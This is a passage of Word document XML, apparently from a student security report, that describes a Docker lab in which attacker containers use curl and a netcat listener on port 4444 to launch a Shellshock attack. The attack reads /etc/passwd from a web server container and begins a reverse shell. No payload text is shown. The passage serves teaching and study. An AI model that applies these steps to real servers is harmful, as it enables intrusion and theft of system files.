      <w:bookmarkStart w:id="185" w:name="_Toc86867531"/>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020719A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ccessing the </w:t>
      </w:r>
      <w:r w:rsidR="006B5D2F" w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>application via the mapped port.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w14:paraId="5173D009" w14:textId="3BAD8D02" w:rsidR="0059192E" w:rsidRDefault="005E33CF" w:rsidP="0059192E">
      <w:r>
        <w:t xml:space="preserve">In addition, two alpine based containers are </w:t>
      </w:r>
      <w:r w:rsidR="00712356">
        <w:t xml:space="preserve">used to exploit the vulnerability of the </w:t>
      </w:r>
      <w:r w:rsidR="00F068E8">
        <w:t>application.</w:t>
      </w:r>
      <w:r w:rsidR="005F228B">
        <w:t xml:space="preserve"> The first container </w:t>
      </w:r>
      <w:r w:rsidR="0061231D">
        <w:t xml:space="preserve">is used to execute </w:t>
      </w:r>
      <w:r w:rsidR="00D10C73">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F92589">
        <w:t>reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="0061231D">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="00D10C73">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0061231D">
        <w:t xml:space="preserve"> and the second </w:t>
      </w:r>
      <w:r w:rsidR="00B6445A">
        <w:t>uses</w:t>
      </w:r>
      <w:r w:rsidR="002722B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B6445A">
        <w:t xml:space="preserve">netcat tool to listen </w:t>
      </w:r>
      <w:r w:rsidR="00D10C73">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00B6445A">
        <w:t xml:space="preserve">any incoming </w:t>
      </w:r>
      <w:r w:rsidR="009B679F">
        <w:t>packets on port 4444.</w:t>
      </w:r>
      <w:r w:rsidR="00160A00">
        <w:t xml:space="preserve"> Also, both containers </w:t>
      </w:r>
      <w:r w:rsidR="00F56568">
        <w:t>are launched in interactive mode</w:t>
      </w:r>
      <w:r w:rsidR="00836F7E">
        <w:t xml:space="preserve"> with the capabilities to execute shell commands.</w:t>
      </w:r>
      <w:r w:rsidR="006E26CB">
        <w:t xml:space="preserve"> The first container is </w:t>
      </w:r>
      <w:r w:rsidR="009B251B">
        <w:t xml:space="preserve">named Attacker1, while the second one </w:t>
      </w:r>
      <w:r w:rsidR="007F0D96">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="009B251B">
        <w:t xml:space="preserve">Attacker2. Figure </w:t>
      </w:r>
      <w:r w:rsidR="007B4C0B">
        <w:t xml:space="preserve">51 illustrates the Docker commands used to </w:t>
      </w:r>
      <w:r w:rsidR="00B024C0">
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidR="007169A9">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B024C0">
        <w:t>Attacker2 container.</w:t>
      </w:r>
      <w:r w:rsidR="00A2005D">
        <w:t xml:space="preserve"> Simil</w:t>
      </w:r>
      <w:r w:rsidR="00F43460">
        <w:t xml:space="preserve">arly, the </w:t>
      </w:r>
      <w:r w:rsidR="007A1462">
        <w:t>other</w:t>
      </w:r>
      <w:r w:rsidR="00F43460">
        <w:t xml:space="preserve"> container is </w:t>
      </w:r>
      <w:r w:rsidR="007A1462">
        <w:t xml:space="preserve">started with </w:t>
      </w:r>
      <w:r w:rsidR="00A50E71">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="0004107F">
        <w:t xml:space="preserve"> name Attacker1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1AFF05" w14:textId="5ACAE719" w:rsidR="007169A9" w:rsidRDefault="007169A9" w:rsidP="007169A9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FD91429" wp14:editId="7D1F5A21">
            <wp:extent cx="5041356" cy="1187450"/>
            <wp:effectExtent l="0" t="0" r="698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041356" cy="1187450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275DB16" w14:textId="4E5409EF" w:rsidR="00D97597" w:rsidRDefault="009E40F6" w:rsidP="00DF3B77">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_Toc86858642"/>
      <w:bookmarkStart w:id="187" w:name="_Toc86867532"/>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>51</w:t>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Attacker2 container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w14:paraId="5DAF8C71" w14:textId="3C06E1D4" w:rsidR="00BD137F" w:rsidRDefault="00BD137F" w:rsidP="00BD137F">
      <w:r>
        <w:t>The output of docker ps c</w:t>
      </w:r>
      <w:r w:rsidR="00D620A2">
        <w:t xml:space="preserve">ommand in figure 52 shows that all </w:t>
      </w:r>
      <w:r w:rsidR="00094E13">
        <w:t xml:space="preserve">the running </w:t>
      </w:r>
      <w:r w:rsidR="00D620A2">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="001000EB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1253FC" w14:textId="77777777" w:rsidR="001000EB" w:rsidRPr="00BD137F" w:rsidRDefault="001000EB" w:rsidP="00BD137F"/>
    <w:p w14:paraId="6FE831AB" w14:textId="2D2CEB46" w:rsidR="00D97597" w:rsidRDefault="00D97597" w:rsidP="00D97597">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A807C28" wp14:editId="28DFC693">
            <wp:extent cx="5168900" cy="908251"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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168900" cy="908251"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B4BC0" w14:textId="1559E4DB" w:rsidR="00A61F06" w:rsidRDefault="001000EB" w:rsidP="00A61F06">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_Toc86858643"/>
      <w:bookmarkStart w:id="189" w:name="_Toc86867533"/>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: All running containers.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w14:paraId="0B54CFD4" w14:textId="7BB00F8C" w:rsidR="00A61F06" w:rsidRPr="00A61F06" w:rsidRDefault="00AB1A95" w:rsidP="00A61F06">
      <w:r>
        <w:t xml:space="preserve">The containers are </w:t>
      </w:r>
      <w:r w:rsidR="0063166A">
        <w:t xml:space="preserve">connected to the same network bridge. Figure 53 </w:t>
      </w:r>
      <w:r w:rsidR="00431658">
        <w:t>shows the containers</w:t>
      </w:r>
      <w:r w:rsidR="00DD40C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00522FDB">
        <w:t>are using their default IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA7924F" w14:textId="43C266EF" w:rsidR="00A61F06" w:rsidRDefault="00A61F06" w:rsidP="00A61F06">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BEA60C7" wp14:editId="1D665F8D">
            <wp:extent cx="5007893" cy="276860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007893" cy="2768600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F3CA59" w14:textId="1F826947" w:rsidR="00045E2A" w:rsidRPr="00045E2A" w:rsidRDefault="00045E2A" w:rsidP="00045E2A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_Toc86858644"/>
      <w:bookmarkStart w:id="191" w:name="_Toc86867534"/>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: IP addresses of the running containers.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w14:paraId="73A583B3" w14:textId="3F7B2F10" w:rsidR="008A0C5A" w:rsidRDefault="008A0C5A" w:rsidP="008A0C5A">
      <w:r>
        <w:t>The main purpose of th</w:t>
      </w:r>
      <w:r w:rsidR="00206C53">
        <w:t>is attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00206C53">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="009F74AC">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00206C53">
        <w:t>launch shellshock attack on the web server container.</w:t>
      </w:r>
      <w:r w:rsidR="006E241E">
        <w:t xml:space="preserve"> From the above, the application is using an IP address 172.17.0.2</w:t>
      </w:r>
      <w:r w:rsidR="00192E92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A3239B">
        <w:t xml:space="preserve">and is connected to the same LAN </w:t>
      </w:r>
      <w:r w:rsidR="006E3D16">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="00A3239B">
        <w:t xml:space="preserve"> the others two containers.</w:t>
      </w:r>
      <w:r w:rsidR="00714563">
        <w:t xml:space="preserve"> Curl and netcat tool</w:t>
      </w:r>
      <w:r w:rsidR="00D55D7B">
        <w:t xml:space="preserve">s are also added on the attacker’s containers. The curl </w:t>
      </w:r>
      <w:r w:rsidR="00515F3D">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="005411B7">
        <w:t xml:space="preserve">ol will allow the attackers to </w:t>
      </w:r>
      <w:r w:rsidR="00BE4B9A">
        <w:t>control the fields in an HTTP request</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="72484309"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="006879F9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="006879F9">
            <w:instrText xml:space="preserve"> CITATION cur21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="006879F9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[90]</w:t>
          </w:r>
          <w:r w:rsidR="006879F9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AD6DBC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E72660">
        <w:t xml:space="preserve"> The application is vuln</w:t>
      </w:r>
      <w:r w:rsidR="00D07696">
        <w:t>erable so that the attacker used the c</w:t>
      </w:r>
      <w:r w:rsidR="00CF3592">
        <w:t>url command to gain access to the web server container’s /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="004B2183">
        <w:t>, as shown in figure 54.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF1F203" w14:textId="7FBDF992" w:rsidR="00567768" w:rsidRDefault="00567768" w:rsidP="00567768">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14EFD96B" wp14:editId="35EA7CAE">
            <wp:extent cx="3858895" cy="1435100"/>
            <wp:effectExtent l="0" t="0" r="825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862691" cy="1436512"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="361C587D" w14:textId="46DE43FD" w:rsidR="00477923" w:rsidRDefault="00477923" w:rsidP="007D6CE5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc86858645"/>
      <w:bookmarkStart w:id="193" w:name="_Toc86867535"/>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>54</w:t>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0009610B" w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Accessing the /etc/passwd directory on the web </w:t>
      </w:r>
      <w:r w:rsidR="007D6CE5" w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>server.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="5374F4FE" w14:textId="48182EF9" w:rsidR="00DC0ABB" w:rsidRDefault="00104199" w:rsidP="00DC0ABB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="001D3CAC">
        <w:t>a reverse shell attack is launched on the vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="00441A8B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CE0EFA">
        <w:t xml:space="preserve"> This will enable the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00574D53">
        <w:t>control the victim</w:t>
      </w:r>
      <w:r w:rsidR="00E56562">
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r w:rsidR="00C2208A">
        <w:t xml:space="preserve">input and output </w:t>
      </w:r>
      <w:r w:rsidR="00EA5882">
        <w:t>remotely</w:t>
      </w:r>
      <w:r w:rsidR="00467898">
        <w:t xml:space="preserve"> because the application runs cgi scripts </w:t>
      </w:r>
      <w:r w:rsidR="00BC66B9">
        <w:t xml:space="preserve">exploitable to </w:t>
      </w:r>
      <w:r w:rsidR="00425BBA">
        <w:t>reverse shell.</w:t>
      </w:r>
      <w:r w:rsidR="00C46ACF">
        <w:t xml:space="preserve"> To achieve </w:t>
      </w:r>
      <w:r w:rsidR="00002F2C">
        <w:t xml:space="preserve">this </w:t>
      </w:r>
      <w:r w:rsidR="00EA72C1">
        <w:t xml:space="preserve">attack, the author used </w:t>
